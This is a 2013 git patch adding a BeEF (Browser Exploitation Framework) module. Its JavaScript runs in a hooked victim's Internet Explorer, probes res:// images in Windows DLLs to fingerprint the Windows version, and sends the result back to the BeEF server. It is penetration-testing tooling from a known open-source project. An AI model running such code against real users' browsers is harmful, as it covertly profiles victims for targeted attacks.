From 065276932c0048a4e1098f8718f5f95b81323064 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 1 Feb 2013 02:51:45 +1030
Subject: [PATCH] Add os_fingerprinting module

---
 modules/host/os_fingerprinting/command.js  | 44 ++++++++++++++++++++++
 modules/host/os_fingerprinting/config.yaml | 16 ++++++++
 modules/host/os_fingerprinting/module.rb   | 20 ++++++++++
 3 files changed, 80 insertions(+)
 create mode 100644 modules/host/os_fingerprinting/command.js
 create mode 100644 modules/host/os_fingerprinting/config.yaml
 create mode 100644 modules/host/os_fingerprinting/module.rb

diff --git a/modules/host/os_fingerprinting/command.js b/modules/host/os_fingerprinting/command.js
new file mode 100644
index 000000000..2c56114f9
--- /dev/null
+++ b/modules/host/os_fingerprinting/command.js
@@ -0,0 +1,44 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var os_version = new Array;
+	var dom = document.createElement('b');
+
+	Array.prototype.unique = function() {
+		var o = {}, i, l = this.length, r = [];
+		for(i=0; i<l;i+=1) o[this[i]] = this[i];
+		for(i in o) r.push(o[i]);
+		return r;
+	};
+
+	parse_os_details = function() {
+		if (!os_version.length) os_version[0] = "unknown";
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "windows_nt_version="+os_version.unique());
+	};
+
+	// OS fingerprints // in the form of: "URI","NT version(s)"
+	var fingerprints = new Array(
+		new Array("5.1+","res://IpsmSnap.dll/wlcm.bmp"),
+		new Array("5.1+","res://wmploc.dll/257/album_0.png"),
+		new Array("5.1-6.0","res://wmploc.dll/23/images\amg-logo.gif"),
+		new Array("5.1-6.1","res://wmploc.dll/wmcomlogo.jpg"),
+		new Array("6.0+","res://wdc.dll/error.gif")
+	);
+
+	for (var i=0; i<fingerprints.length; i++) {
+		var img    = new Image;
+		img.name   = fingerprints[i][0];
+		img.src    = fingerprints[i][1];
+		img.onload = function() { os_version.push(this.name); dom.removeChild(this); }
+		dom.appendChild(img);
+	}
+
+	setTimeout('parse_os_details();', 2000);
+
+});
+
diff --git a/modules/host/os_fingerprinting/config.yaml b/modules/host/os_fingerprinting/config.yaml
new file mode 100644
index 000000000..8282f1b2e
--- /dev/null
+++ b/modules/host/os_fingerprinting/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        os_fingerprinting:
+            enable: true
+            category: "Host"
+            name: "Fingerprint Operating System"
+            description: "This module attempts to fingerprint the Windows Operating System version using the 'res' protocol handler for Internet Explorer. It loads images from DLLs specific to different versions of Windows. This method does not rely on JavaScript objects which may have been modified by the user or browser compatibility mode."
+            authors: ["bcoles"]
+            target:
+                working: IE
+                not_working: ALL
diff --git a/modules/host/os_fingerprinting/module.rb b/modules/host/os_fingerprinting/module.rb
new file mode 100644
index 000000000..5946f4e7c
--- /dev/null
+++ b/modules/host/os_fingerprinting/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# Uses methods described here:
+# http://www.itsecuritysolutions.org/2010-03-29_fingerprinting_browsers_using_protocol_handlers/
+
+class Os_fingerprinting < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['windows_nt_version'] = @datastore['windows_nt_version'] if not @datastore['windows_nt_version'].nil?
+    if content.empty?
+      content['fail'] = 'Failed to fingerprint Windows version.'
+    end
+    save content
+  end
+
+end